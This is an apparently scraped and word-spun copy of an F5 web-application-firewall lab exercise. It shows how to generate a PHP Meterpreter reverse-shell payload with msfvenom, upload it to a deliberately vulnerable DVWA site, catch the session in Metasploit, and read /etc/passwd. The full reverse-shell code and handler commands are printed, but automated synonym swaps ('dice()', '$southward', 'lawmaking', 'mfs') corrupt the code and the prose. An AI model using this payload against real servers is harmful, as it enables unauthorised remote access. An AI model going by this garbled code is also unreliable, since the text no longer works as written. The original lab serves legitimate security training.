How to Upload a Shell to a Website Metasploit

• Community Training Classes & Labs > F5 Web Awarding Firewall Solutions > Do two: Exploiting a Web Server

Exercise ii: Exploiting a Web Server¶

This exploit uses some of the basic functions of the DVWA spider web site to demonstrate how to hack through the site itself. A hacker would utilize this as a means of circumventing your perimeter to gain access to your applications, servers, and data.

We will start by creating a pre-canned slice of PHP lawmaking that we will upload to the web server through the upload office on DVWA. For this exercise you volition need to locate the external IP for your Kali server. This IP is generated dynamically for each student but we take written a script and an iRule on the CTF server to return the IP accost you'll need.

On the Kali server, run the following:

                $ msfvenom -p php/meterpreter/reverse_tcp lport=4444 -f raw lhost=`curl -k https://ctf.f5lab.biz/whatismyip`   % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current                                  Dload  Upload   Total   Spent    Left  Speed 100    14  100    14    0     0    492      0 --:--:-- --:--:-- --:--:--   518  No platform was selected, choosing Msf::Module::Platform::PHP from the payload No Arch selected, selecting Arch: php from the payload No encoder or badchars specified, outputting raw payload Payload size: 950 bytes  /*<?php /**/ error_reporting(0); $ip = '<YOUR-IP>'; $port = 4444; if (($f = 'stream_socket_client') && is_callable($f)) { $s = $f("tcp://{$ip}:{$port}"); $s_type = 'stream'; } elseif (($f = 'fsockopen') && is_callable($f)) { $s = $f($ip, $port); $s_type = 'stream'; } elseif (($f = 'socket_create') && is_callable($f)) { $southward = $f(AF_INET, SOCK_STREAM, SOL_TCP); $res = @socket_connect($due south, $ip, $port); if (!$res) { dice(); } $s_type = 'socket'; } else { die('no socket funcs'); } if (!$s) { dice('no socket'); } switch ($s_type) { case 'stream': $len = fread($s, four); break; instance 'socket': $len = socket_read($s, 4); break; } if (!$len) { die(); } $a = unpack("Nlen", $len); $len = $a['len']; $b = ''; while (strlen($b) < $len) { switch ($s_type) { case 'stream': $b .= fread($south, $len-strlen($b)); pause; case 'socket': $b .= socket_read($s, $len-strlen($b)); break; } } $GLOBALS['msgsock'] = $s; $GLOBALS['msgsock_type'] = $s_type; eval($b); die();              

Highlight the section of lawmaking that was generated from the /*<?php to the terminate dice();

Open a Command Prompt on the Windows PC. In the command prompt blazon:

                cd Desktop notepad hackdvwa.php              

In Notepad, paste the copied code and and shut the file.

Open a Web Browser and go to https://dvwa.vlab.f5demo.com

Log in with admin / countersign

Choose the Upload menu on the lower left

Click Cull File and select the hackdvwa.php file you just created on the Desktop and click Upload

The file is and then posted to the server and the location is displayed for y'all as a means of confirmation. You tin re-create this and paste it at the finish of the URL in the browser.

In the browser, visit that file'south location: http://dvwa.vlab.f5demo.com/hackable/uploads/hackdvwa.php

This will actually fail and y'all should see a "no socket" message, but nosotros'll set that up next.

Back to the Kali ssh session we will ready the server to connect to from the web server.

If yous're not within msfconsole anymore, first it:

Now we want to cull an exploit to run.

                msf > utilize exploit/multi/handler              

To encounter what is selected for this exploit by default, blazon:

                msf > options  Module options (exploit/multi/handler):      Name Current Setting Required Clarification     ---- --------------- -------- -----------  Exploit target:      Id Name     -- ----     0  Wildcard Target              

this selects the exploit nosotros'll run in Metasploit

                msf > set payload php/meterpreter/reverse_tcp              

To see the options for this payload, type:

                msf > options  Module options (exploit/multi/handler):      Name Current Setting Required Clarification     ---- --------------- -------- -----------  Payload options (php/meterpreter/reverse_tcp):      Proper name  Current Setting Required Description     ----  --------------- -------- -----------     LHOST                 yeah      The mind accost     LPORT 4444            yes      The listen port  Exploit target:      Id Name     -- ----     0  Wildcard Target              

This chooses the bodily payload we're going to send through the exploit and we'll set some parameters. To see the options:

                msf exploit(handler) > gear up payload php/meterpreter/reverse_tcp payload => php/meterpreter/reverse_tcp  msf exploit(handler) > show options  Module options (exploit/multi/handler):      Proper noun Current Setting Required Clarification     ---- --------------- -------- -----------  Payload options (php/meterpreter/reverse_tcp):      Name  Current Setting Required Description     ----  --------------- -------- -----------     LHOST                 yes      The listen accost     LPORT 4444            yes      The listen port  Exploit target:      Id Name     -- ----     0  Wildcard Target              

Fix the options every bit follows:

                mfs > set up lhost ten.i.10.240 mfs > gear up lport 4444              

lhost and lport¶

These options are the 'local' listening IP and port for the exploit. Note that the IP here is the internal NAT'd IP address. In the above PHP code you entered the External NAT'd address.

Render to your web browser on the Windows PC and refresh the page.

At present we tin start the server:

exploit¶

Exploit is the fun command… here we are running the exploit we desire to see. Y'all can also use run but exploit is so much more Hacker.

Later on a few seconds, y'all should see:

                  [*] Started opposite TCP handler on 10.1.ten.240:4444 [*] Starting the payload handler... [*] Sending stage (33986 bytes) to <YOURIP> [*] Meterpreter session iii opened (10.1.10.240:4444 -> <IP>:PORT) at <Appointment>                

And then a moment or two after:

Meterpreter¶

Meterpreter is the "Swiss Regular army Pocketknife" of the Metasploit Framework. You tin open a meterpreter console upwards through an exploit, similar we just did. In this instance, we gear up Metasploit to listen for incoming traffic on port 4444 on our NAT'd internet address. We had to practise this because the DMZ address isn't accessible by the Spider web Server simply it is allowed to connect to the internet. We then run the uploaded PHP lawmaking we generated which opens the connectedness and at present we're able to run commands on the spider web server as though we had an ssh-similar connection.

Allow's examine the web server so see what we can discover.

In the Meterpreter shell blazon:

Nosotros tin can the post-obit:

                meterpreter > dir Listing: /var/www/dvwa/hackable/uploads =======================================  Mode              Size  Blazon  Last modified              Name ----              ----  ----  -------------              ---- 100644/rw-r--r--  667   fil   2013-07-08 12:55:06 -0400  dvwa_email.png 100644/rw-r--r--  950   fil   2017-06-nineteen 09:11:52 -0400  hackdvwa.php 100644/rw-r--r--  951   fil   2017-06-14 13:fifty:15 -0400  hackme.php.txt              

We can see what accounts are on this server past typing:

                meterpreter > cat /etc/passwd              

To run into a list of the commands that are available to you, yous can type aid at whatever point

Experience free to investigate the web server, when you're finished type exit and the Meterpreter vanquish will close.

Note that when you shut the session, the spider web page finally ends spinning.

peekpandeo.blogspot.com

Source: https://f5-agility-labs-waf.readthedocs.io/en/latest/class2/module1/lab2.html

Share this post